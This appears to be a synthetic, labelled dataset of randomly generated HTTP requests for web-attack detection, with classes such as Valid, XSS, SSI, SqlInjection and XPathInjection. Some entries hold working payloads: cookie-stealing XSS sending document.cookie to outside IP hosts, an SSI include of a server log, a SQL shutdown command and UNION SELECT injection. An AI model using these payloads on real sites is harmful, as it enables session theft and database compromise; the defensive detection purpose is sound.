Authorization: Basic aXRsbzplNjlhc2g=
Range: 23407-76
Referer: /6ennfo.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 7.2; hc-sr; rv:6.9.7) Gecko/44205471
UA-CPU: MIPS
UA-Disp: 508,842,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 575x699
Via: hyN/7.2 207.61.16.205
Transfer-Encoding: eata; o6nsIism=leeo3rtO
Upgrade: DoR/2.1, rahogo/2.6
Warning: 131 201.134.124.106 "nmLen" 
X-Forwarded-For: 98.230.255.210
X-Serial-Number: 29101464435877036
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12766
Start - Id: 46876
class: XSS
POST /pgcIiw.jpeg? HTTP/1.0
Content-Length: 234
Content-Language: nfwde,inht,SS
Content-Encoding: gzip
Content-Location: /oeii/2CruW2R/toay/8sti/McaEsfr.bin
Content-MD5: T1RlUmZ5ZWFzcm1uaXdlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Apr 07 18:53:00 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: 217.38.107.81
Connection: aa3ott
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 89.81.27.19
Cookie: eftsWO=htytMoTnwinnt|;1zhttps9NG=httpseeio?peDa8ee
Cookie2: $Version="8"
Date: Tue, 23 Mar 04 10:27:14 CET
ETag: "qpH2R-@HEM1V6hUP"
Expect: mleses2
From: xorersew@0i1thu.fr
If-Modified-Since: Thu, 04 Feb 10 16:49:13 UTC
If-Unmodified-Since: Fri, 08 May 09 05:57:59 CET
If-Match: "RYN5Ev1671H6Ag1W"
If-None-Match: *
If-Range: *
Max-Forwards: 855
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest nonce
Range: -692,548156-61437,-79
Referer: http://www.srua.biz/3tle.css
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 3.4; id-su; rv:0.4.9) Gecko/54481843
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2245x173
Via: 4.1 www.ramcnooi.jpeg:4355
Transfer-Encoding: ms8en
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 479 70.40.194.240 "olAdtnTro" "Wed, 14 Apr 10 22:00:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wmh=dtjErt_lRJ&U00nyhBCqPRt=<iframe   src   =  "     vbscript:[window.open('http://193.12.178.130/onraor.php'+document.cookie);]    "  >&hEoa=59&tPQ9L@=dmlmoTalA?levb&tepInarion=8inslMgnapjsqdiain

End - Id: 46876
Start - Id: 12303
class: Valid
GET /njgce3mdbti6zcWaptec/nf/eutn1olcosntSzvbgi.asp? HTTP/1.0
Host: 82.121.24.82:450
Connection: keep-alive
Accept: video/mpeg;q=0.7, text/*, image/*;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.7, utf-7, windows-1255
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 49.9.133.115
Cookie: 0script6OhrWMacceptI7@=4
Cookie2: $Version="74"
Date: Sat, 09 Apr 05 17:25:02 GMT
ETag: "GwBN0nMB2QWnAOLX"
Expect: 100-continue
From: iman0m@blrqt7ti.gov
If-Modified-Since: Tue, 11 Jan 05 07:10:09 UTC
If-Unmodified-Since: Sat, 21 Jun 08 09:21:21 CET
If-Match: *
If-None-Match: "RWIDMaIyqMIalYFzX"
If-Range: Fri, 21 Jan 05 11:19:44 GMT
Max-Forwards: 75
MIME-Version: 2.7
Pragma: 0ouswyh=anfr
Proxy-Authorization: nat0lr uooaajy1=gemieovr
Authorization: Digest nonce
Range: 825826-,0906-,1304-02
Referer: http://ntsaebwc.gov/e6rae/daeavB/gevsCh/t9pnr.html
TE: trailers
Trailer: Host
User-Agent: Rormeubdt (kvwWBwG9tQ)
UA-CPU: 68000
UA-Disp: 1340,7925,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: 5.7 www.o7na.gif, 4.5 www.oaeo.png, 5soee/1.2 200.32.167.157
Transfer-Encoding: ore2e; c6io=osgnfsu
Upgrade: lwuepe/6.4, pao/4.1
Warning: 542 www.ouhyte.jpeg "Gsrfo4dsrHenieOoa" 
X-Forwarded-For: 175.249.76.8
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12303
Start - Id: 39667
class: SSI
GET /cpeN@w6iuIO/eafsl/arsxOedt/2YOFz3.wfa/d_tyZHphsYb5/iS@wh964/oZ7UuHnfPNTsvltPu/r0khi.4ZhJmWmUbDG7lW/Tbdelete/fcCCJ0mWxBhqu/cJB6RnA.FSSO0a/ya7.css?wm2thm1euwepeo1=epEyGsbMWNH&nrEhtuiejatshw=heVTK4cg&nrealrHtirnd=mTBooMrCxeX6&Fadmin5vMftpY@O=ipio&yoat=i5%27zu7y%3E%3A&knge=%3C%21--++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&i0=a%26icqoexecT6+&sifEhadepi=oasxyemeuTr&Sh6vq0boot.iniIJ=prTntivnet&oi7nsnjeetnh=2645&e3GyWu5Fstdina3=03873410&l5oloeaxS=Enu HTTP/1.1
Host: 241.190.52.206
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: rMvo-Itx;q=0.4, dhoee-mdouD, tut-a;q=0.1, Leta-scoaJ
Cache-Control: min-fresh=59
Client-ip: 38.60.133.84
Cookie: rrzpsODcaee=g7xy_e@kjP;ehvhayi=ci3kryne2eni;a@B-5Z3Nz8A=eedij;ekzQ=465
Cookie2: $Version="257"
Date: Tue, 08 Sep 09 02:20:57 CET
ETag: W/"@SqQ0wgGgYvjaSt"
Expect: Nt5znH=tdnfAI4n
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 19 Aug 09 08:43:53 CET
If-Unmodified-Since: Fri, 24 Jun 05 19:45:12 CET
If-Match: *
If-None-Match: "GNA9-AmAhp8X3WPux9"
If-Range: *
Max-Forwards: 775
MIME-Version: 3.4
Pragma: okHr='lsnaw'
Proxy-Authorization: n0eu ard9hoW=9os6s
Authorization: NTLM dzB0Ym9vZnJlb3RuZ3NlMm5kb253bnNpbWhMbmU0ZG9zbGRieWlpZGthMWl5dw==
Range: -7190
Referer: http://www.frnEt.be/deiyo/uo1qtaY/lnecoir.pdf
TE: chunked;q=0.6
Trailer: Accept-Language
User-Agent: oitfeon (aScWalj; c@qJj47BT; e2Ud6_bdrS; tR94B_Ij7)
UA-CPU: 68000
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8969x195
Via: FTP/3.7 www.dxeetn.gif, 4.5 68.130.56.226, FTP/6.8 www.bsth.shtml
Transfer-Encoding: deflate
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39667
Start - Id: 35310
class: SqlInjection
GET /Pttjoa/wlWePx@F9h-4kyUQgtc/jdImdeqrestN/a9R_x1r2On2t@/kpZ-@1Y/meOwog.aKzsB/IqvSdropRn-b/xg/l3KtaMzsjIw2Nt/QJm4GANq/rFprocessing-instruction28w@zlbgsoundyzB.php4?MAHfZinputa=%27%3B++shutdown-- HTTP/1.1
Host: 217.120.56.132
Connection: ni7Nc
Accept: application/x-tar;q=0.7, video/mpeg;q=0.6, image/gif;q=0.6
Accept-Charset: macintosh, koi8-r, iso-10646-ucs-2;q=0.3, windows-1258;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 213.3.132.26
Cookie: WtsriFa9e=oaade;glAemrsgoxiri=oahd?ciDe;atntutelB=reoaotraxw;erh47lsh=nv;AmaeVs=eea=pdx ytsamaallgd
Cookie2: $Version="28"
Date: Tue, 19 Feb 08 16:06:41 CET
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: qleceo=dsstvain;uas2soO=vedesi
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Mon, 10 Aug 09 21:42:18 CET
If-Unmodified-Since: Sun, 25 Jul 04 14:04:43 CET
If-Match: "UZcdnfx8.OFJUnD"
If-None-Match: *
If-Range: *
Max-Forwards: 474
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Basic bmVvd25nZTo2YWFlZWxk
Range: 165737-,1988-39961,-87
Referer: /hWnch/xnead/fqtry.wav
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.4 (X11; U; Open BSD i586 3.3; 7i-oL; rv:4.8.4) Gecko/01263495
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 198x9357
Via: 3.3 100.195.92.131, FTP/9.9 www.oshtcnx.css
Transfer-Encoding: BOe3e; 94roeiu=nBEeoaih
Upgrade: dzlnt/9.5, oo3l/2.4
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 8712797310669
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35310
Start - Id: 21439
class: Valid
GET /euGEw-aiBot@MB_N/obielo1rL08totA.dll? HTTP/1.0
Host: www.eRce9.ch:80
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.5, iso-8859-15, iso-10646-ucs-2, ks_c_5601-1987;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: tzt58ozk-oigikyTL, scy-Tsou, Evsgnh-mrit, oTohena-6rrtet;q=0.6, fi3aRqn-Tssofn
Cache-Control: qBa='wastm0e'
Client-ip: 184.231.194.80
Cookie: voloa=t09Z7gl4;uceereutidn7o=eKaXb-hYi;WVlvpGEdCwinnt=proq
Cookie2: $Version="7"
Date: Mon, 24 Dec 07 23:22:11 CET
ETag: "WD1LgnrHRobaABksLm"
Expect: 100-continue
From: unnd4yhe@pnsUaeitiH.biz
If-Modified-Since: Sun, 15 Jan 06 24:52:52 GMT
If-Unmodified-Since: Fri, 28 May 04 22:24:38 UTC
If-Match: "mYaCTm7-Myv5oUu5"
If-None-Match: "hUNfaFaEP.mkbiy"
If-Range: Tue, 18 Dec 07 13:27:18 UTC
Max-Forwards: 0
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic N29vbDpuekZvZXJodA==
Authorization: Digest algorithm=MD5
Range: -5794,717335-,08-
Referer: http://www.taitlr.org/se5o/c5exr.gif
TE: trailers,trailers,deflate;q=0.7
Trailer: Accept-Encoding
User-Agent: yndmeOu/9.8.2
UA-CPU: Sparc
UA-Disp: 839,365,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2698x837
Via: 2.0 3.10.76.95
Transfer-Encoding: qlso
Upgrade: nDnsno/7.5, s4ef/9.2, 6L4/6.6
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 074187220
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21439
Start - Id: 2451
class: Valid
GET /f3hlaCTjdi/TrmRcdYq/fn5xcs/gohG/mm4utMo9ZudvDa@/Eetre9dt/d8nvzfp8sme/dZ1XqkXorQv9v9Xis8.sh?ilboipltn=6504&STa8trnliqedI=sLC&edO1ee=msi6nfA&3vlpSart5t=tnaqata&l8=0&oacioa=qntoaynsagmi7euhi&loa=7566&dJ@jecho=21843&ijautoexecuEIKU01=d%3Arn1N+I&e4ANP4X=tW&ThttpsS0aM4EX=3173641 HTTP/1.1
Host: 107.177.242.148
Connection: close
Accept: video/quicktime;q=0.0, application/rtf, text/html;q=0.2
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 37.176.251.14
Cookie: Td0ha9daoht=SwiovestsShe;yho5gg6iu1rtq1i=703855;dexecl3=eaaPoc
Cookie2: $Version="76"
Date: Wed, 24 Sep 08 03:11:53 GMT
ETag: W/"ZCj64kCP90U_7@j"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Sun, 27 Nov 05 06:16:42 UTC
If-Unmodified-Since: Mon, 31 Aug 09 04:28:00 GMT
If-Match: *
If-None-Match: *
If-Range: "e6BYd0ekkhf6b0lNvMRd"
Max-Forwards: 03
MIME-Version: 8.3
Pragma: sniUso=ri9
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM VG9qb3NzdDdzdGRsd2xUZ25oeWoxaHI4b2JheWkyU3NudWU2bGw4aQ==
Range: 7-5,5430-
Referer: /dv6sE5b/tekesmx/leum/sEelenh.tar.gz
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 4.0; ii-nr; rv:5.4.0) Gecko/57785156
UA-CPU: x86
UA-Disp: 097,5060,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 750x609
Via: 0.9 www.srhB.gif, HTTP/1.7 20.158.248.249
Transfer-Encoding: deflate
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 416 www.pteq.html "largswoidrewai" "Wed, 11 Aug 04 24:11:21 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2451
Start - Id: 252
class: Valid
GET /io3tteesnfardatlwzue/lyidepm/o7cxCOpt/peJ75eahnacose7mas.jpeg?erttn5eylrpl=sT&RMPMwZ6=dn&obu47bSiieemF=mohk&ee=0-Zddm&aMeiiun65Swzr=fni0 HTTP/1.0
Host: www.esFNm.com
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, cp-950;q=0.1, euc-kr, x-mac-korean;q=0.8
Accept-Encoding: gzip;q=0.4
Accept-Language: *;q=0.6
Cache-Control: min-fresh=72943
Client-ip: 124.33.47.215
Cookie: uOxggP-Vyx=35209;scoi1onoo=eUrG
Cookie2: $Version="731"
Date: Sat, 09 Aug 08 13:32:46 GMT
ETag: W/"VqZEHgS9xPIrz8BBNB"
Expect: tpitsuee=kaEHtmts
From: yeXhbouc@7trpphie.it
If-Modified-Since: Thu, 05 Jan 06 14:13:27 CET
If-Unmodified-Since: Tue, 22 Dec 09 15:12:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: nnedm sagh=xef1hdc
Authorization: Digest nc=4955930C
Range: -05955,931914-,024-
Referer: /r9ne/iathHT/msAf/tsdaihai/unaw.avi
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: datTrng/7.1.1.5
UA-CPU: StrongARM
UA-Disp: 7657,8182,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 2.4 www.shaer9.jpeg, HTTP/4.3 www.echtsnes.css
Transfer-Encoding: deflate
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 778 228.207.156.98 "emdbsg0nhaeda1q" "Thu, 02 Sep 04 15:14:39 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 388092866322
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 252
Start - Id: 19493
class: Valid
GET /seescusoets3enwsb/ygmeyt/h8FKuptF/Hle/nr5rheedn3p/nI1JqgwUSCgU5lZXgi/nH3R4kCX@J3aioou/8rf0coyobuh0/eTSjZAw2/emiooc/aEe04laT/P05.k_LqlocationLBsystemKx.php4?so6o=Rirgri&pescayydR=983&EJbzHhtaccesuX=heohh&cmyobs=betweenzat&1mED1WXjv=e%27r+f%7E%28%7C%24o%25ussg%3B0az HTTP/1.1
Host: www.inasn1hyOm.fr:0668
Connection: keep-alive
Accept: video/quicktime, text/xml;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.4
Accept-Language: d-eieRSnGd, t6see-a;q=0.2, il-inee;q=0.7
Cache-Control: no-store
Client-ip: 221.151.112.102
Cookie: etihchwrr=n<tiw 9drophvx
Cookie2: $Version="1"
Date: Sun, 05 Nov 06 06:01:44 UTC
ETag: W/"gQfMlcTr0-Xv2dG"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: oeonm@ce9paig.cz
If-Modified-Since: Sun, 23 Sep 07 01:11:59 UTC
If-Unmodified-Since: Wed, 09 Aug 06 11:50:46 CET
If-Match: "a9oruW2XYTflIpgZAV"
If-None-Match: *
If-Range: Sat, 29 Oct 05 12:57:13 UTC
Max-Forwards: 6
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: dyoh arnnm=ristiW2z
Range: -39876,97552-
Referer: http://e0tncpxc.be/eoHei/rferdfOo/e6ih.tar.gz
TE: trailers,deflate,deflate
Trailer: Accept-Encoding
User-Agent: rwa0iAmZ7 (eRRGpI9)
UA-CPU: StrongARM
UA-Disp: 190,715,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 570x2839
Via: 7.9 204.91.194.167, 5.2 www.utca.png, 4.1 63.224.11.47:27
Transfer-Encoding: compress
Upgrade: bpjc/2.9, garUt/9.6, exo/6.6
Warning: 200 www.edye.shtml "udeeoogE9s7" "Mon, 18 May 09 13:56:42 CET"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19493
Start - Id: 42752
class: SqlInjection
PUT /fbrrtrn/uc9@LKES/aotdZwten/0fGP88/heptffpt7eaEehefUcIy/0ehntweTt/7Amw3-WveRUYjTxu/sgo3ipeewnei/Gs8Hsaw53oen7bm/pRIZ.jyCGi68/23m/twrkNyAu9nl9CBHgjutb.png? HTTP/1.1
Content-Length: 72
Content-Language: neivc,rjh,rEyn47
Content-Encoding: deflate
Content-Location: http://aBdl.net/epOnA0P.txt
Content-MD5: aWliZXQ1ZWxpdWRvYWV5cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jan 10 16:36:11 GMT
Last-Modified: Sun, 11 Jun 06 21:01:40 CET
Host: www.nc1nv0stn.st
Connection: close
Accept: audio/*;q=0.7, text/html
Accept-Charset: iso-8859-5;q=0.2, euc-kr, windows-874
Accept-Encoding: compress;q=0.5
Accept-Language: *;q=0.1
Cache-Control: min-fresh=4644
Client-ip: 194.34.123.255
Cookie: yzH66wagfrwS=OR  'f7h'  IN  (    '    '    )
Cookie2: $Version="64"
Date: Tue, 15 May 07 06:55:17 CET
ETag: W/"d-pzHwCCQ5X3bGPf-Dq"
Expect: ontcazbo
From: tnehuje@osoicnh.gov
If-Modified-Since: Sun, 04 Feb 07 03:33:20 CET
If-Unmodified-Since: Fri, 21 Aug 09 13:30:41 CET
If-Match: "a7gLHj46pyc1K8jxHHeg"
If-None-Match: *
If-Range: Mon, 25 Sep 06 04:43:25 CET
Max-Forwards: 556
MIME-Version: 7.1
Pragma: no-cache
Authorization: wnqoDd jar4kid=nsffes
Referer: http://2nPaah.net/aayltn/lJsoll/Leoohe.mp3
TE: trailers,gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 7.2; ne-sC; rv:2.8.0) Gecko/15500340
UA-CPU: Sparc
UA-Disp: 511,399,32
UA-OS: Mac OS X
Via: HTTP/3.6 www.oqee4oa.gif, nnho6/5.1 www.hfnine.gif, FTP/6.6 198.61.114.83
Transfer-Encoding: gzip
Upgrade: ot4vpa/8.5
Warning: 782 14.246.109.246 "r0pot" "Sat, 22 Jan 05 18:48:54 UTC"
X-Forwarded-For: 42.86.213.239
----: --------------------

eMEeo=crh&Tbxhservicess9xH5=t5rzEtoibcoedra&istsg91vtp=t2kze&uarlb=91752

End - Id: 42752
Start - Id: 4437
class: Valid
PUT /catk-9S/naaoveueeerrfoIsn/zyiframelKinputLh3q/lr1-Usin/Pwn1m3heeperpywa9s/hWpijj4gY.asp? HTTP/1.1
Content-Length: 99
Content-Language: ktedsx,6
Content-Encoding: gzip
Content-Location: http://3oEh.it/aaeead/20obeF.sh
Content-MD5: MG9ibmRhaTNsZWhubXlsVw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Apr 07 09:55:50 UTC
Last-Modified: Sun, 03 Jan 10 13:45:56 UTC
Host: 207.216.64.29
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: hrOe='baijie9'
Client-ip: 72.91.226.93
Cookie: BSNFm=7ecs;id=hha\d;srfai=rsaT;yorrtuploaee=ahpeoengnsne;atuvne21njE=accepttejq5Adar;eNIAittel5Ld= w0;(+sShe1n:0(lhws
Cookie2: $Version="774"
Date: Tue, 17 Feb 09 23:20:27 UTC
ETag: W/"oqC62Vkc92.YfFJ"
Expect: 100-continue
From: rh3qx@gsao.net
If-Modified-Since: Tue, 19 Jul 05 03:09:42 GMT
If-Unmodified-Since: Mon, 05 Jan 04 07:25:48 UTC
If-Match: "uZfg9@farve8J_GCCnJ"
If-None-Match: *
If-Range: Fri, 22 Dec 06 04:06:37 UTC
Max-Forwards: 31
MIME-Version: 6.4
Pragma: e1gxqa='heqi'
Proxy-Authorization: Digest cnonce="p1qwbnT"
Authorization: NTLM U2VpWnhyYW9lb2F0c25ydHdvYTVvZWVJUmVocjJ0dW90dA==
Range: 85423-38937,6-5478
Referer: /ntsew/eFesntez/sc33oaae/hdhho/se7t.js
TE: deflate,gzip;q=0.6,trailers
Trailer: Authorization
User-Agent: Mozilla/3.6 (compatible; dbcbsedhta; Linux i586; h4empe; sDe9ye; Tte7bIrh)
UA-CPU: MIPS
UA-Disp: 3339,068,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: FTP/4.2 31.97.24.184
Transfer-Encoding: gzip
Upgrade: zscdse/7.1, 1ntn/4.8, caw/0.2, nhnaei/2.6, jrla3/2.1
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 9.134.134.209
X-Serial-Number: 91470301728015054
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

es=m1sAFn5hIXBau&scrrtri0hna=awotSsock_streams&tru7ehsc=3&er4teDkmodhpss=mfh2tof&oa8se=mvR.CJEg0txW

End - Id: 4437
Start - Id: 48126
class: XSS
GET /aXDDqI0Kh/n5LMmF2ENn_L2ru/6M.js?ozaLmscdAs=uqj&tUa=8228350&oahIevenXsktO=gThtpass&oc=ofLIlhsetn&nUIZ=i%25n&dYxAY=h09LPUM47&tr2sfGEoha=%3Cimg+++++src%3D%22orns++%3E+%22++++onmouseover++%3D+%22+++++%5Bwindow.open%28%27http%3A%2F%2F15.76.244.118%2Flige.jsp%27%2Bdocument.cookie%29%3B%5D++%22+%3E HTTP/1.1
Host: 102.79.153.127
Connection: So7arsu
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate;q=0.7, identity;q=0.1, identity
Accept-Language: eS71ir-f, 6it-0Ee601uo;q=0.1
Cache-Control: no-store
Client-ip: 94.244.224.171
Cookie: 177Op0h1aaeb=708327;swdoTwstihk=7JmA
Cookie2: $Version="2"
Date: Fri, 19 Nov 04 22:05:34 UTC
ETag: "81CJYj67o6Z9p@2p45s"
Expect: 100-continue
From: odallu0e@nalp.cz
If-Modified-Since: Sat, 06 Nov 04 06:27:25 GMT
If-Unmodified-Since: Fri, 28 Jul 06 24:37:01 CET
If-Match: *
If-None-Match: "pPyhl2RzTMxcqb7VQ"
If-Range: *
Max-Forwards: 28
MIME-Version: 3.4
Pragma: eds=euro
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 2-92,159872-,109519-
Referer: /BdTrZp/r7lwefit.sh
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: o0xWA-kJm6 http://www.eizgt.com
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2048x2568
Via: FTP/1.8 14.0.112.33, FTP/5.7 www.aueee4t.tiff, 1.2 108.55.125.76:8
Transfer-Encoding: aWp4; ttoef=lbly
Upgrade: 1ld/1.5, ec6b/0.1, A7r/0.6, peeQ/2.5
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48126
Start - Id: 35770
class: XPathInjection
GET /ett.tiff?o1acHdwdeo=mndhrwssesweutd&mh=We&F-n.=dcrsmsrtfOnih8h&ee9iorAteaau4u=tnr0nlcsu&rl9Rh6a=dYu1qgrC&ysrec=sgest&OqsCojii=8960&Y5kFIN=ee%27%5D++++%7C+++P++%7C++%2F%2Fuser%5B+++name%2Ftext%28%29+%3D++%27gl&tnat=qzb_P3c&sahfnj=clogatn52&ra=ehocfOfyke&lmlaSnt4heaoCe=e2ivoihn HTTP/1.0
Host: www.mrncicfknA.com:80
Connection: keep-alive
Accept: image/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 92.208.144.125
Cookie: de7s=asot;2oh8txpeotee=5nmsMrqu;nsoidooneic4hh=rheealsaSfnih5e
Cookie2: $Version="75"
Date: Mon, 21 Feb 05 06:40:04 GMT
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: 100-continue
From: Nginnon@eatp.net
If-Modified-Since: Mon, 21 Aug 06 16:47:35 GMT
If-Unmodified-Since: Thu, 08 Nov 07 05:21:28 CET
If-Match: "n084PCi1_0wB.v-s"
If-None-Match: "e1mIVbAplscG3RX@UO0"
If-Range: "nxdlgqVkrrGLlz@PEALt"
Max-Forwards: 11
MIME-Version: 7.7
Pragma: ltw=misener
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: NTLM bnNhdHRzZTFjZXhkbmVlbHRlZ2dsaXA4TWQzNmVobWdzYW5pbmFhZWlubmU=
Range: 9042-41
Referer: /v2Fh/eozimesr/sElisse/rnech9u/Rlah.nsf
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/7.9 (compatible; MSIE 0.2; Linux i386; rSs1awist)
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6100x360
Via: 8.8 www.w6ti.shtml, 2.6 163.130.140.159, pEyjis/6.7 www.t6eteuao.css:7440
Transfer-Encoding: gzip
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 740 216.155.89.107:131 "6yr34ie5" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35770
Start - Id: 41597
class: SqlInjection
GET /nTtY459uoLiSa/rhST.gt7HFCQovJbaY_i/YxoTEs/oaupuli1e2Aemeorth/ew3U2yRtm/sock_streamLlUIhttp72VEfmN4/BreplaceMq9zZKunionaKPM0n/er.php3?02it4hnbe1l=++nsa%7C++y1%406e1%29ciw&dizeoperosOsAn=%27+%29+++++UNION+++++ALL+++SELECT+++++5389+FROM++n8s9khln+WHERE++++%28++%27%27%3D++%27&ae=rt8tnmEmcH2elnsyg&ewelaterw=sgopr1tjpassthrueaerlinktNlupdatef&el2iyjdltetay=1&mpjB=tUlU1Bm2SlT&c3FcgbuttL8eiIe=46729&dyrd=68460&es6eon=327629678&eehcue99dkv=9Ae&uinltaeagnSsm=Rnnmsgwwerp%3Ancib%2Fu&oammifRhnxe4=tformeelubyztajs HTTP/1.0
Host: 54.207.128.231
Connection: keep-alive
Accept: video/*
Accept-Charset: windows-1255, iso-8859-1;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: lb1aieei='s'
Client-ip: 70.60.65.162
Cookie: oXje=oprocessing-instructiont perl6cc;risivt=xtermodm;it6mihofhm5oeo=+;sw2dxchmto0k=C3chOne;esaty=5tt+8lors
Cookie2: $Version="7"
Date: Wed, 29 Jul 09 18:54:00 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: mainn@tiee.st
If-Modified-Since: Thu, 27 May 04 17:37:51 CET
If-Unmodified-Since: Tue, 25 Nov 08 07:27:59 GMT
If-Match: *
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Wed, 26 Aug 09 09:40:06 GMT
Max-Forwards: 6
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic U3MwcGhyd2E6c2FldG4=
Authorization: Basic TkFpZWw6aWxzQnBy
Range: 7594-
